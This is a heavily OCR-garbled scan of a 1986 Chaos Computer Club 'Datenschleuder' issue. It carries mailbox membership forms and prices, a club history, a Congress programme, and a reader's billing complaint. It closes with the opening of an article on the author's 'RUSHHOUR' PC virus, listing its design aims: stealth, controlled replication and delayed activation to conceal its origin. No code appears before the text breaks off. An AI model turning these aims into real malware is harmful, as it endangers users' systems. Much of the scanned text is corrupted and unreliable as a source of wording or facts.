beantragt hatte nicht zustellen könne, mir bliebe aber frei¬ 
gestellt die Aufstellung im Amt einzusehen. Jenes würde aber 
nochmal zwei wochen dauern, da die Aufstellung noch nicht 
da sei. Nach abermalsdrei Wochen klingeltedann endlich das 
Telefon. Ziemlich kleinlaut erklärte mir die Dame am Apparat 
daß man angewiesen worden wäre mir 990.- DM zu erstatten, 
da im Datex-System ein Softwarefehler gewesen wäre. Was 
das nun ist wußte sie natürlich nicht und sie hatte von Oatex-P 
natürlich auch keine Ahnung, da müßte ich mich schon an die 

dafür zuständige Stelle wenden. Ich legte dann auf und 

dachte darüber nach was wohl einige größere Firmen ge¬ 
macht haben die diesem ’Softwarefenler zum Opfer fielen ? 
So ein Fehlertrrttja nichtnurbeieinem auf. Ich nähme an sie 
haben ihren Mifarbeilern gesagt sie sollen nicht soviel lefe' 
fonieren (wenn ihnen die erhönie Summe überhaupt aufge- 
fallen ist) und haben ohne zu zögern die Rechnung bezahlt 

nubff.wB 19860416 1900 8 SB/Sy 










Für die Teilnahme am Chaos Communlearton Centar 

Ich/Wir wollen Teilnehmer auf dem Chaos Commurecohon 

Center der Club-Mailbox, werden, (nur mit Einiugsermächh- 

' gung) 

Benutzername:.(max. 15 Stellen, nur A-Z als er¬ 

stes Zeichen, danach Telexzeichenvorrot ohne Umlaute). 

Kennwort zur Einrichtung:.(mindestens 6 Stellen) 

Bei Teilnahme erkenne ich die Nutzungsbedingungen tur das 
Chaos Communication Center an. Die Nutzungsgebühren von 
mindestens DM 8,— werden monatlich abgebucht. 

UnterVchrifi,' bei Minderjährigen die des gesetzlichen Vertreters 


yerLns..^:^f 

S^atenSdilettbev 


Das wissenschattHche Fachblatt für Datenreisande 

Ein Organ Cnaos Computer Club 



Sx i .. O . S 3 iS o .§5 S? t icc 

i iii o.3| =1-5 it ;i 

fr 15 M I ■ I l|i II Is' •:! 

Einzugsermöchtigung. Das Mitglied ermächtigt den CCC eV PostteiUahl, Ort, Datum 

widerruflich, die Mitglledsbeiträge idhrlich oder halb|ährlich - - 

sowie die Nutzungsgebühren für das Chaos Communication-^ - 

Center monatlich oTjbuchen zu lassen. OatenschutMnweis: Die Daten werden während der Milglied- 

schaf t zur maschinellen e /- Verarbeitung gespeichert. 

i w»/.-/.choos T«llne.hm»r/l n/s | von nachstehend angegebenem Konto einzuziehen 

ZA Postgirokonto-Nr. ^ beim Postgiroamt 

~ZA Girokonto^. ' ^ ^ ^ ^ ' Bankleitzehidee Kreditinstituts 

3 I I I I I I I I I _I_—^—I——I—^——lJ W^T 

B Name und Anschrift des Kreditinstitutes 


wr 

Das Konto wird beim Geldinstitut unter tolgender Bezeichnung geführt (Name des Kontoinhabers) 


E Von den Hinweisen der Deutschen Bundespost für die Teil- 
0 ) nähme am Lastschrifteinzug habe ich Kenntnis genommen. 

e- ^ 

-E D> 

Ol P. 


T-V- 

lünTr- 


wird vom Amt für Chaos gsprilft 

ggf. SA 80 gepruH | SA 00 geprüft 


Unterschrift do/r/s Kontolnhober/ln/s 


D&s yiTssenschäftltche Fachblatt für DalanrelMrde 

Eirt Oryan des Cnaos Corriputer Club 


^atenödiieuDet 


Choos Cemmunkation CenterFragen & Antworten 

kommfi !th aufdi^ CCC-MaUbox? 

— nur als Mitglied 

— durch Antrog {siehe rechts) 

— ich brauche ein Girokonto 

Wie werde Ich Mitglied? 

— Durch Antrog (siehe rechts) 

Was wollt ihr? 

— aktive Mitarbeit und/oder Unterstützung 

— zwonzig Mark AufnoKmegebühr (Verwoltung) 

— von Schülern und Studenten sechzig Mark im Johr 

— von anderen einhundertzwanzig Mark im Jahr 

Warum brauche Ich ein Girokonto? 

Oie Abrechnung der Moilboxkosten geschieht Im Einzugsver¬ 
fahren. Anders ist die Verwaltungsorbeit für uns zu kompliziert. 
Viele ,Kreditinstitute führen kostenfreie Schülergirokonten 
(meist ohne Magnetkarte), sollten Euch eure Lehrnmiftelgeld- 
verwolter nicht fördern. 

Was kostet die CCC-Moilbox? 
Grundgebühr inklusive 47 Freimtnuten monatlich DM 8,-. Die 
werden jeden Monat eingerogen. 

Die Bonx erholt eine Floppy von uns. 

Dozu kommen bei Bedarf: 
jede weitere Anscholtminute 15 Pfg 

je versendete Nachricht im CCC-System 7 Pfg 

je Telefonolarm (BRD) 80 Pfg 

deiweiferen leider noch Geldbeutel: 

— Dotenbonkgebühren je noch Dotenbonkobfroge 

— Telex, Telexgebüliren plus geringer Zeitgebülir 

— Nachrichten in andere Systeme, Datex-P Zuschlag. 

Htitiöö? 

Ihr erreicht das CCC-System über einen Telefonport (Bremen) 
oder mehrere Dotex-P Zugönge. Für DM 8,- hobt ihr einen Ein¬ 
trog auf dem CCC-System. Die Nutzungsgebühren innerhalb 
des Systems sind preiswert. Teurer werden Dotenbankdiensfe, 
Telex und Intermoilverblndungen zu onderen Moilboxsystemen. 
Die werden je noch Aufwand weiterberechnet. 

Was verdient der CCC daran? 

Nix. 

Die Mailboxgebühren werden ohne Aufschlag weitergegeben. 

Was habe Ich xu beochten? 

Für die Mailbox wird derzeit die Nutrunasordnung vom Chaos 
Computer Club erstellt. Sie regelt dos Teilnehmerverholtnls ent¬ 
sprechend den Vertrogsbedingungen für rjic Benutzung des IN¬ 
FEX-Systemes. Wesentliche Punkte enrhölt dieser Beitrog. 

Was passiert nun? 

7. Ich fülle den Antrog rechts kräftig ousi 

2. Wir stimmen meist zu. 

3. Der Beitrag wird überwiesen, eingezogen oder gebracht. 

4. Liegt eine Einzugsermöchtigung vor, stellen wir auf Wunsch 
einen Eintrag im CCC-System zur Verfügung, 

5. Weitere Leistungen für Mitglieder können nicht ausgeschlos¬ 
sen werden und sind beabsichtigt. 

Wie komme ich wieder raus? 

Aus dem CCC nur einmal im Jahr mit dreimonatiger Vorwar¬ 
nung. Aus der Mailbox mit drei Monaten Kündigungszeit. 

CHAOS-TEAM 

Choos Communication Congress 1986 

Z 8 + 2 . TSez hetf 

* ’ Durch dos verlängerte Welh- 
nochfswochendende ergibt sich diesmal kein Wochenendter¬ 
min. Die Aufbauorbelten In den Raumen des Eidelstedter Bür¬ 
gerhauses beginnen om Somstag dem 27. Dezember. Ab Sonn¬ 
tag können Arbeitsgruppen, Hilfskräfte und Teifnehmer anrei- 
sen. Obernachtungsmöglichkeiten werden vom Sonntag bis 
Dienstag bereitgehalten. < 

Der Congress wird am Montag um 10 Uhr eröffnet und endet 
Dienstag gegen 22 Uhr. 

Anregungen für Themenbereiche, sowie Referenten sind will¬ 
kommen (Fernmündlich 040/483752 Leitstelle 23 — da meldet 
sich ein MENSCHI). Weitere Informationen sowie die Teilnah¬ 
mebedingungen werden zum Äugigst in der datenschleuderhe- 
konntgegeben. is23 


DV-unterstützter Informationsaustausch 

Auf der Basis der Erfahrung mit Mailbox-Systemen in den USA, 
die dort grenzüberschreitend Informationsaustausch Für Oppo¬ 
sitionsgruppen betreiben, sollen diese auch in Deutschland ver¬ 
stärkt genutzt werden. Insbesondere die Koordination¬ 
serfahrungen, die man mH der Datenkommuntka- 
tion in den USA für Besefzungsplenung von öffentli¬ 
chen Oebäuden \rt über 30 Städten gewonnen hotte, hot die 
linke Szene in der Bundesrepublik aufmerken lossen. Auf 
schnellstem Wege hatten bei dieser spektokulären Aktion die 
Besetzer untereinander Informationen oustouschen können und 
ihr Verhalten gegenüber den Sicherheitsbehörden koordiniert. 
Aus: SICHERHEITS-SERA TER, S. 133 (Handelsblattverlach) 

Chaos Communication Center — Hintergrundinfo 

Der CCC schafft einen elektronischen Treffpunkt als Forum für 
seine Mitglieder und wählte ah Werkzeug CeoNet, dos derzeit 
ausgereifteste Mailboxsystem in Europa. Als Setreiber mochte 
die Bremer Infex GmbH das beste Angebot. 

Die Infex GmbH stellt dem CCC Systemanteile auf einem nur 
von Vereinen genutztem Moilboxsystem zur Verfügung. Die 
Einzelobrechnungen der Teilnehmer werden nicht vom Betrei¬ 
ber (Infex), sondern vom CCC durchgeführt. So Ist es möglich, 
kostengünstig ein GeoNet-Moilboxsysfem im Rahmen der CCC 
Mitarbeit zu gebrauchen. 

Die GeoNet Mailboxsysteme werden derzeit in der Bundesre¬ 
publik neben der Infex auch von der Deutschen Moilbox kom¬ 
merziell betrieben. Die'Österreichische Post hat sich, im Gegen- 
sotz zur Bundespost, für eiri GeoNet Moilboxsystem entschie¬ 
den. Durch die reiotiv hohe Kostenschronke von ca. DM 40,- 
Grundgebühr konnten sich bisher nur Firmen den Komfort eines 
solchen Systems leisten. 

Der CCC ermöglicht bei Mindestnutzung des Systems für Mit¬ 
glieder Nutzungskosten von DM 8,- Im Monat. 

‘Dieim GeoMaH-Verbundjetztzusommenarbeitenden mehre¬ 
ren Tausend Benutzer repräsentieren eine sehr heterogene und 
infernofionole Leserschoft mit Querverbindungen zu vielen an¬ 
deren elektronischen Medien und damit zu einer Orasi Reot 
PopuloHon (elektronische Eingeborene) von oufgeschlosse- 
nen Menschen, die nicht nur possiv Nachrichten konsumieren, 
sondern sie dank des Mediums MAILBOX aktiv und aufwand¬ 
sarm kommentieren können. Es ist diese neue Fähigkeit, die 
Mailbox-Systeme so grundlegend anders machen, als traditio¬ 
nelle Kommunikations-Medien “ (Günter Leue, GeoNet) 

Grundsätzliche Merkmale des CCC-Systems 

— Zugriff über das Ferngespräch (1 Port / 37nld) __ 

— Zugriff über dos Datex-P Netz (7 Ports) 

— mehrsprachige befehlsorientierte Dialogführung 

— gleichzeitiger Zugriff durch 8 Hocker 

— zeitgesteuerte Verwaltung von 23 persönlichen Bitbergen 

— Schwarze Bretter, themenoezogene InFosammelplötze 

— clubbezogen und zu allgemeinen Interessen 

— Nochrichtenousfausch mit Teilnehmern oder Schwarzen 
Brettern in anderen GeoNet-Systemem im In- und Ausiond 

— Dialogmöglichkeit onwesender Teilnehmer 

— Flndefunktionen für Nochrichten und Verzeichnisse 

— Telefonsklove zur Alarmierung von Teilnehmern bei ^ 

wichtiger Post ^ 

— Versand und Erhalt von Telexen (derzeit nur weltweit) 

— Zugriff auf Datenbanken, Presseagenturen... 

Neben dem CCC werden zwei weitere Vereine und einige Wis¬ 
senschaftlergruppen gemeinsam. In einem Moilbox-Gremium, 
das System gestalten. 

Der CCC wird die Clubarbeit und den Kontakt unter den Mit¬ 
gliedern aus oller Welt auf seinem elektronischem Clubcenter 

dem CHAOS COMMUNICATION CENTER, abwickeln. 
ev2.txi 


















WAiMi ■Mwii Geonel: Geo1 :Chaos-Teom 

Anschriftenausschnitt bitte ^chZrÄlas bix-, * 655321 # 

mit liAiiAT AHffVhMUh Tfinif^ üas wissenschaftlich« Fachblatt für Datenreisende 

m« neuer zurw^ Computer Dup 


mit neuer Aefa^esse zurück 



Chaos Computer Club 

Partner auf dem Weg zur Informationsgesellschaft. 

Mit Wirkung vom }4. April 1986 wurde der Chaos Computer 
Club e. V. unter der Nummer 10940 beim Amtsgericht Hamburg 
in das Vereinsregister eingetragen. 

Es begann 19811 mit einem Treffen von Computerfreoks In Ber¬ 
lin. Die ersten Personal Computer eroberten die Büros und wa¬ 
ren zu erschwinglichen Preisen im Handel. 

Mon wollte Informationen tauschen, doch gab es damals kaum 
Möglichkeiten dafür. Die Bundesrepublik wor auf diesem Ge¬ 
biet ein Entwicklungsland. 

Im Februar 1984 erschien die datenschleudermW Informationen 
für die Szene, die sich als "wissenschaftlich" bezeichnet, für die 
aber auch Bezeichnungen wie "Underground-Postille" und 
"Hockerschmlerblott" verwendet werden: dos Fachblatt für Da¬ 
tenreisende. 

Seitdem bemüht sich ein offener Kreis von Leuten darum, Infor¬ 
mationen über die Verwendung der Technik — insbesondere 
Neuer Medien — zu sammeln und zugänglich zu machen: 
Bürgorhllfe Im Tochfilkdsehungol. 

Dur<^ die spektakuläre Btx-Aktion des CCC tm September '84 
(Verbraucherschutzaktion 134.000,- bei der Haspa) erregte der 
Club bundesweites Aufsehen. 

Leider sind wesentliche Aktivitäten des CCC im Medientrubel 
untergongen oder wurden fälschlich dorgesfellt. 

Teile der Presse schreiben "Hacker" in Gänsefüßchen und ver¬ 
kaufen sie als Computerterroristen und gefährliche Datenräu¬ 
ber. Während mit einer Hacker-Panik noch Zeitschriftenumsät¬ 
ze geschürt werden und ängstliche Anwender von cleveren "Be¬ 
ratern” die bedenklichsten Sicherungssysteme aufgedrückt be¬ 
kommen, und viele den Computer verteufeln, zieht die Informa- 
tionsgesellschaft kaum bemerkt in unsere Kinderzimmerein. 
Hackersind neugierige Reisende im modernen Alltag. Forscher 
und Menschen, die sehr bewußt — und offen — mit Neuen 
Technologien umgehen. 

Computerkriminelle haben im Gegensatz dazu Gehelmhaltung¬ 
sprobleme und Bereicherungsabsichten. 

Die Gesetzgebung zur Computerkriminalität trägt dem auch 
Rechnung. 

Die Älteren und die deutsche Industrie betrachten 
erstaunt die Bntwlcklungj manche fassungs- und ta¬ 
tenlos. Andere begreifen, was los Ist. Insgesamt 
wächst dos BewuStsein um Datenunsicherheit stetig, 
aber langsam. 

Zum Herbst '85 stellte der CCC sein Wissen In der Hocker- 
bibel Teil 1 zusammen (Die Hockerbibel ISBN 3-922708-98-6). 
Das 256 Seiten umfassende Werk wurde bisher über 3500 mal 
zu einem "sozialem" Preis von ca. 13 Pfennig die A4-Seite ver¬ 
trieben. 

Zweimal bisher, jeweils zum Johreswechsel, veronstaltete der 
CCC den Choos Communicotion Congress. Dos jährliche inter- 
nathnale Treffen von über 400 Dalenrehenden führte Interes- 
s/erfe Menschen zusammen und verdeutlichte die Loge: Wenig 
Informationen, kaum technologische Förderung der Jugend, 
keine Erfahrung Ober die SoxlalvertHigllchkeft neuer Tech¬ 
nologien. 

Darin spiegelt sieh auch die Rasanx d«r Entwicklung. 


Modernes Opfer 

dpa Heilbronn Oie Verwechslung zweier Adopter- 
Stecker hat In der Heilbronner Kinderklinik zum Tod 
eines 16 Monate ölten Mädchens aeführt. Eine Kran« 
kenschwester hatte Meßefekfroden eines Gerätes, 
das das Herz überwacht, an einen Infusomaten an- 
geschiossen. Das Baby bekam einen Stromschlag 
von 220 Volt. (Hmb. Abdbi 2.5.86) 

Oie Informationsgesellschaft unserer Toge ist ohne Computer 
nicht mehr denkbar. Die Einsatzmöglichkeiten der automatisier¬ 
ten Datenverarbeitung und Datenübermittlung bergen Chan¬ 
cen, aber auch Gefahren für den Einzelnen und für die Gesell¬ 
schaft. {Präambel der CCC Satzung) 

Das große Informatiortsbedürfnis in der Bevölkerung überflute¬ 
te das Chcos-Teom mit Bergen von Anfrogen, ober auch Ver¬ 
waltungsarbeiten. Die Aboabfeilung der Datenschleuder erwies 
sich als ein kraftsaJgendes schwarzes Loch. Dem CCC fehlt es 
an einem totkroftigen Sekretariof plus Computern. Auch die 
Clubräume in Hamburg (Anlaufodressse, Redaktionsräume und 
Tagung von Erfahrungsaustauschkreisen) stellen den Club vor 
finanzielle, organisatorische und rechtliche Probleme. 
Zahlreiche Anfragen, zur Teilnahme on öffentlichen Informo- 
tionsveronsJoltungen rund um Informations- und Kommunika¬ 
tionstechniken, Verbraucherschutz sowie den Einsotz soziolver- 
träglicher Technologien drohten die Kapazitölen der hambur- 
ger Gruppe zu sprengen. 

Einziger Ausweg ist die Offensive, die Gründung eines Verei¬ 
nes. Dadurch ist es dem CCC möglich, jedem Mitglied die Nut¬ 
zung eines Mailbox- und Informationssystemes zugönglich zu 
machen. Oer CCC bietet ein Forum zum elektronischem Infor¬ 
mationsaustausch auf internationaler Ebene. 

„Nach uns die Zukunft; vielfältig uns abwechslungsreich durch 
Ausbildung und Praxis im richtigem ümgong mit Computern. 
Wir verwirklichen soweit wie möglich das NEUE Menschenrecht 
auf zumindest weltweiten freien, unbehinderten und nicht kon-. 
trollierbaren Informationsaustausch unter ausnahmslos ollen 
Lebewesen. 

Computer sind dobei eine nicht wieder obschoffbore Vorous- 
setzung. Computer sind Spiel-, Werk-, und Denk- 
Zeug; vor ollem aber: "dos wichtigste neue Me¬ 
dium". Zur Erklärung: Jahrhunderte noch den "Print”-Medien 
wie Bücher, Zeitschriften urd Zeitungen enstonden Medien zur 
globalen Verbreitung von Bild und Ton; olso Foto, Film, Rodio 
und Fernsehen. Das entscheidenste heutige neue Medium ist 
der Computer. Mit seiner Hilfe lassen sich Informationen 
"über olles denkbare" In dieser Galaxis übermitteln 
und — kraft des Verstandes — wird neues geschoffen.“ (Aus 
der Datenschleuder 1, Februor 1984), 

Bildschirmtext hat gezeigt, daß man ein Z-Klossen-System (An¬ 
bieter und Abrufer) keinem bewußtem Menschen zumuten 
kann. Mailbox-Systeme kennen nur eine Klosse. Jeder Teilneh¬ 
mer kann Informationen obrufen, kommentieren oder selber 
welche über die Schwarzen Bretter enbieten. 

Eine Mitgliedschaft im CCC e.V. ermöglicht die Teilnahme am 
Nachrichtenverkehr auf einem Geonat-Systom zu Preisen 
der Wunschmaschln« Bildschirmtext. Alle Mallbox-Toll- 
nohmer sind gleichberechtigte Informationsanbieter in 
einem Informofionsbasor rund um Wissenschaft, Technik und 
alles was Spaß macht und wenig kostet. Kommerzielle Aktivitä¬ 
ten der Mitglieder sind dort unerwünscht. 

"Der Chaos Computer Club ist eine golaktische GemeinschoB 
von Lebewesen, unabhängig von Alter, jGeschlecht und Rosse 
sowie gesel/schoft/icher Stellung, die sich grenzüberschreitend 
für Informationsfreiheit einsetzt und mit den Auswirkungen von 
Techno/og/en auf die Gesellschaft sowie das einzelne Lebewe- 
sen beschäftig! und das Wissen um diese Entwicklung fördert," 
(CCC-Safzung), 

Der CCC behält seine offene Struktur. Er bietet Interessierten 

mehralsain Forum. MIfun,di.Zukunft/ 



Damit Sie auch morgen noch kraftvoll zubyten kön¬ 
nen: Zum dritten Mal veranstaltet der CCC in Ham¬ 
burg seinen Communication Congress. Vom 27. De- 
zember(Aurbauiag) über Sonntag und Montag (Con- 
gresslage) bis zum Dienstag den 30. Dezember (Ab¬ 
baulag) treffen sich Dalenreisende, Telefonfreaks, 
Informationspfadfinder, Funkmaniacs, Netzflaneue- 
re, Bitniks, Hacker und Hacksen. 

Veransialtungsort ist das Eidelsiedicr Bürgerhaus. 
Elbgaustraße 12, in Hamburg Eidelstedt. 

Dort öffnen sich am Sonntag den 28. Dezember 
gegen 10 Uhr die Tore. Helfer und Referenten wer¬ 
den schon ab Samstag Nachmittag eingelassen. We¬ 
gen der technischen Demonstrationen gelten die 
Räuniiichkeiien als „Elektrisches Labor“, zu dem nur 
Unterwiesene Zutritt haben. Jeder Teilnehmer hat 
sich bei örtlichen Funkamateuren oder Elektronikern 
vorher fachkundig zu machen. Das Fotografieren 
sowie das Aufzeichnen mittels Tonträgern ist, wie in 
den vergangenen Jahren, aus Datenschutzgründen 
untersagt. Im Rahmen der Pressearbeit sind TV- 
Teams anwesend. 

Gäste benötigen dieses Jahr kein Passfoto, lediglich 
Helfer bekommen einen Ausweis und sollten ein 
Passfoto mitbringen. Sollte ein Gast auf einem SOU¬ 


VENIR bestehen, erhält er natürlich einen. 

Der Eintritt beträgt für Mitglieder (CCCeV) DM 15,-, 
für alle anderen DM 20,-, mit Ausnahme der Presse 
(DM 50,-) und gewerblichen Teilnehmern (DM 150.-) 
Voranmeldung durch Einzahlung auf Postgiros 
599090-2Ü1 beim Poslschleckamt Hamburg BLZ 
20010020 für den CCCeV. Bitte Beleg mitbringen! 
Der Betrag gilt für die ganze Congressdauer. 
Schlafplätze sollte man sich privat besorgen. Fragt 
über die Hamburger Mailboxen an. Wer es sich lei¬ 
sten kann, dem sei ein preiswertes Zimmer auf der 
Reeperbahn (da gibts nachts noch was zu essen) emp¬ 
fohlen. Für Ausnahmefälle hat der CCC ca. 30 
Nachtlager (Schlafsack!) von Samstag bis Montag in 
petto. 

Während des Congresses ist die CONGRESS-BOX 
unter der Rufnummer 040-5703060 online. (ACH¬ 
TUNG: Diese Nummer gilt nurvom 27. - 30.12.!) 

Die VERMITTLUNG des Congresses ist über die 
Rufnummer 040-5703086 ab Freitag erreichbar. 
WEITERE INFORMATIONEN in der CCC Ge¬ 
schäftsstelle 040-4903757, der CLINCH-Mailbox 
040-6323517 oder, für Referenten und was Organisa- 
tionsfragen betrifft, Leitstelle 23: 040-483752 (Voi- 
cel). 


Dateascbleuder t 



4 


Kongressfahrplan 



Sanistts 27. Dezember (Aofbautag) 

Für Techniker, Referenten und Unlerstützer 


Sonntag 28. Dezember (1. Congresstag) 


09:00 Einlass für Mitarbeiter, Techniker und Refe¬ 
renten 

09:30 Abnahme der Räume (letzter Sicherheit- 
sCheck) 

10:00 TORI: Einlass fürOäste. Öffnung. 
HACK.-CENTER:Technik al la Cart’ 
CHAOS-CAFE: Frühstück und Cafe 
TREFF; Raum für Gesprächsgruppen (bitte anmel¬ 
den) 

ARCHIV: Fotokopiererund viel Papier 
BILD&FUNK: Datenfunk und Bildschirmlext 
11:00 THEATER: Eröffnungsansprache. Hinweise 
zum Ablauf 

11:30 TREFF: Infotrefffürdie Presse (max. 30 Min.) 
12:00 THEATER: Sichere Kopplung an das Postnetz. 
Was läuft 

bei der Post; Prüfverfahren. Verhalten bei Haus¬ 
durchsuchungen. (Workshop BHP,CAC,CCC) 

13:30 THEATER; Parlakom - das Parlament am 
Netz. 

Computer im Bundestag (Vortrag der Hamburger) 
14:30 THEATER: Die Computer Artists Cologne 
stellen sich vor. 

14:30 TREFF: Datenfernübertragung für Anfänger 
(Workshop) 

15:30 THEATER: PC-Virenforum (Workshop 
BHP.CCCundGäste) 

- Was sind Computerviren? (Vortrag) 

- Wie arbeiten Viren? (prakt. Demo) 

- Gibt es einen Schutz vor Viren? (Workshop) 

- Umgang mit Viren, Ausblick (Diskussion) 

18:30 Ende 

18:50 THEATER: Video Uber den letzten Congress 
(bis 20:20) 

19:00 TREFF: Organisationsgespräch der Projektlei- 
ter 

19:30 Schliessung der Räume. Alle gehen ms Theater. 
20:00 THEATER: Hinweise auf das Programm vom 
Montag, 

Übernachtungsmöglichkeiten,... 

20:30 Tagungsende 

21:00 Schliessung der Räume (Wachdienst) 



aPA3MMi iPATCm 

aaSujiim 


= TO TEET = 

TO ÄiXPnMO 
TETPArQNO 



Montag 29. Dezember (2. Congresstag) 


08:00 Aufklaren der Räume durch Nachtschicht 
09:00 Einlass der Mitarbeiter, Raumabnahme 
09:30 TORI: Einlass fürOäste. Öffnung. 

10:00 THEATER: Programmvorschau 

10:30 THEATER: Kompromittierende Abstrahlung; 

Abhören 

von Monitoren und Fernsprechern. (Workshop 
BHP.CCC) 

11:30 THEATER: Frühschoppen 

Fünf Hacker aus sechs Ländern (in Englisch) 

13:00 TREFF: Pressetrefr(CCC,CAC,BHP und Gä¬ 
ste) 

13:00 TH EATER; Resümee des Sysoptages vom letz¬ 
tem Congress. 

Kurz zu InterpoolNel. Hinweise auf Workshops. 

14:00 THEATER: Informationen zum Netzverhund 
FIDO-NET 

14:00 TREFF: Auswirkungen des 2. WiKg. 

Workshop auch über "Hacker-Jäger" (BHP) 

15:00 THEATER: Desktop Puplishing - die Zeit¬ 
schrift vom 

Schreibtisch. Am Beispiel des Cenethischen Informa¬ 
tionsdienstes. (Vortrag) 

15:00 TREFF; Regionale Vernetzung von Mailboxen, 

Serversystem 

(Vortrag und Demo CAC) 

16:00 TH EATER: Noch offen 

16:30 TREFF: Btx als preiswerter Datenserver. Vor¬ 
schlag 

zum Datenaustausch für Mailboxsysleme.(Idee) 
17:00 TREFF: Mailboxen - neue Konzepte (Refc- 
rat&Diskussion) 

18 ;00 TH EATER: Abschlussansprache, Ausblick 
20:00 Schliessung der Räume für Gäste 
21:00 Abbau der privaten Technik (geordneter Rück¬ 
zug) 

22:00 Schliessung der Räume (Wachdienst) 


^ 


Wo ist der CCC? 



Zur Lage der Chaos Communication Center 



fei 

Infbrmations 
V_ i 


DerCCC bietet seinen Mitgliedern zwei Möglichkei¬ 
ten zur elektronischen Kommunikation an: 


4 ^ 

I. Die INFEX-Mailbox (über DATEX*P) 

Für eine Eintragungsgebühr von DM 20,- sowie eine 
monatliche Mindestnutzungsgebühr von DM 8,- wird 
die Nutzung eines GEONFT-Systems angeboten. 
Auf diesem kommerziell genutzten System haben die 
Mitglieder den üblichen Komfort eines GEONET- 
Systems. Dazu zählen: Mitteilungsversand im GEO- 
NET, Telexzugang und Abfrage von Datenbanken 
usw. Aus Kostengründen wird die elektronische DA¬ 
TENSCHLEUDER in Zukunft ..kostenpflichtig“ im 
GEONET abzurufen sein. Es ist dem CCC nicht 
möglich, weiterhin die hohen Aufwendungen zur In- 
formationsgestaltung zu bezahlen. Diese Beweg¬ 
gründe stehen auch hinter der Entscheidung, wesent¬ 
liche Telle derClubkommunikaiion aufdie Hambur¬ 
ger CLlNCH-Box zu verlegen. Im Wesentlichen be¬ 
stehen jedoch weiterhin die in der DS)6 erwähnten 
Lcistungsmerkmale. Es ist immer noch unklar, wann 
die INFEX-Box übereinen Telefonponerreicht wer¬ 
den kann. Wir empfehlen die Teilnahme am INFEX- 
System all denen, die für ihren Kommunikation einen 
TELEX-Zugang benötigen und die Vorteile eines 
Mehrportsystemes zur reibungslosen Kommunika¬ 
tion brauchen. 

Hier kurz die Nutzungskosten der INFEX im Rah¬ 
men der CCC Nutzung: (Mitgliedschaft im CCC so¬ 
wie Erteilung einer Einzugsermächtigung) 

Eintragung einmalig DM 20,- 
Mindestnutzungfürmtl. DM 8,- 
je Verbindungsminute DM-,15 ! 
je Nachricht DM -,07 ! 
je Telefonalarm DM -,80 ! 

Telex, Datenbanken und InterMail-Vermittlungen 
extra. 

! (Diese Preise werden bei negativer Feststellung der 
Gemeinnützigkeit des CCCeV noch mit der Mehr¬ 
wertsteuer belegt.) 

Monatlich werden die angefallenen Nutzungskosten 
berechnet und eingezogen. Die Kündigungsfrist be¬ 
trägt 3 Monate. 




2. Die CLlNCH-Box (über Telefonport Hamburg 
und Datex-P) 


Der wesentliche Grund zur Verlagerung der Club¬ 
kommunikation ist der Standortvorteil der CLINCH- 
Box. Sie ist für die Hamburger zum Ortslarif erreich¬ 
bar und verfügt zudem über einen Datex-P-Zugang. 
Die CLINCH-Box unterscheidet sich jedoch von 
dem Standard der INFEX-Box. So kann jeweils nur 
ein Nutzer(wahlweise Telefon oder Daiex) zugreifen. 
Auch fehlt der Komfort in Sachen Datenbanken und 
Telexverkehr. Es wird zwar eine Vermittlung angebo¬ 
ten, die jedoch nur ein Notlösung ist. Wer den Telex- 
Zugang benötigt, sollte das komfortablere INFEX- 
System wählen. 

Auf derCLINCH-Box wird in Zukunft die DATEN¬ 
SCHLEUDER redaktionell erstellt und (da dieses 
System auf Sclbstkostenbasis betrieben wird) auch 
kostenfrei zum Abruf angeboten. Es finden sich dort 
auch diverse Diskussionsforen der Mitglieder und 
anderer Gruppierungen. 

Hier kurz die Nutzungskosten der CLINCH-Box; 
Mitgliedschaft im CCC (für den Zugang zu den clu¬ 
binternen Infos) 

Für Schüler und Studenien DM 24,- jährlich Für 
Vollverdiener DM 60,-jährlich zuzüglich Kosten für 
vermittelte Dienstleistungen (Telex,Datenbankabfra¬ 
gen..) 

Die Nutzungsgebühren für das System werden direkt 
von der CLINCH Box in Rechnung gestellt. Kündi¬ 
gungsfrist zum Ende jeden Monats. 

Die Redaktion hofft, daß durch Wahl eines preiswer¬ 
teren Kommunikationsweges mehr Interessenten den 
Zugang zu Clubinformationen finden, als dies bisher 
möglich.war. Weiterhin werden die Mitglieder, die 
einen Zugang zu GEONET benötigen, diesen im 
Rahmen der Mitgliedschaft preiswert erhalten. Im 
Vordergrund der Auswahl für eines der beiden Sy¬ 
steme sollte einzig die Frage des Bedarfs stehen. Ge¬ 
wisse Kommunikationsaufgaben lassen sich nur mit 
kommerziellen Systemen bewältigen, andere hinge¬ 
gen sind preiswerter lösbar. Lassen Sie sich von der 
Geschäftsstelle des CCC beraten. 

Anfragen zur Teilnahme an den Mailboxsystemen im 
Rahmen der CCC- Mitgliedschaft können an die 
Clubadresse oder die CLINCH Box mit dem Stich¬ 
wort „CC-Center“ gerichtet werden. 

Fernmündliche Auskünfte: 

CCC Geschäftsstelle; 040- 490 37 57 
Btx-Redaktion LS23 :040- 48 37 52 
Datenauskünfte: 

CLINCH Telefon : 040- 632 35 17 
CLINCH Datex : 44400090314 
Im GEONET : Brett IFXl :Datenschieuder 
LS23 


Datenschleuder 3 




Funktion und Aufbau des Virus 
”RUSHHOUR” 



(Läuft auf allen IBM<kompatiblen Rechnern, nicht jedoch 
auf aüei MS-DOS Rechnern wie Olivetti usw.) Viel über 
allgemeine Computerviren will ich hier nicht reden, 
sondern nur den Aufbau und die Funktion meines Vi¬ 
rus erklären. Folgende Forderungen an das Virus- 
Programm hatte ich mir gestellt: 

1: Es sollte so unauffällig wie möglich arbeiten, d.h. 
kein Disketten- oder Plattenzugriff, der dem auf¬ 
merksamen (!!) Benutzer unlogisch vorkommt, 

2 : Absolut alle bisher auf dem Rechner lauffähigen 
Programme sollten weiterhin völlig normal rechnen. 
3: Der Virus sollte sich kontrolliert vervielfältigen, 
d.h. er sollte sich nicht an jedes Programm hängen, 
damit seine Existenz nicht durch eine immer mehr be¬ 
legte Platte/Diskette auffällt. 

4: Die Aktivität des Virus sollte zeitverzögert einset- 
zen, um die Herkunft des Virus (also: welches Pro¬ 
gramm hat den Virus cingeschleust) zu verschleiern. 
Am Anfang hatte ich mir überlegt, einen Virus zu 
schreiben, der sich in jedes lauffähige Programm 
(.COM oder .EXE) einbinden kann. Das ließ ich 
dann aber aus folgenden Gründen sein: 

1 r.COM und .EXE-Files sind unterschiedlich in ihrer 
Dateistruktur. Das V-Programm muß zwischen den 
Arten unterscheiden können und sich selbst der 
Struktur anpassen. Das kostet unter Umständen sehr 
viel Speicherplatz für den Virus. 

2: Eine Infektion von so vielen Dateien ist durch den 
vermehrten Platzbedarf auf dem Speichermedium 
auffällig. 

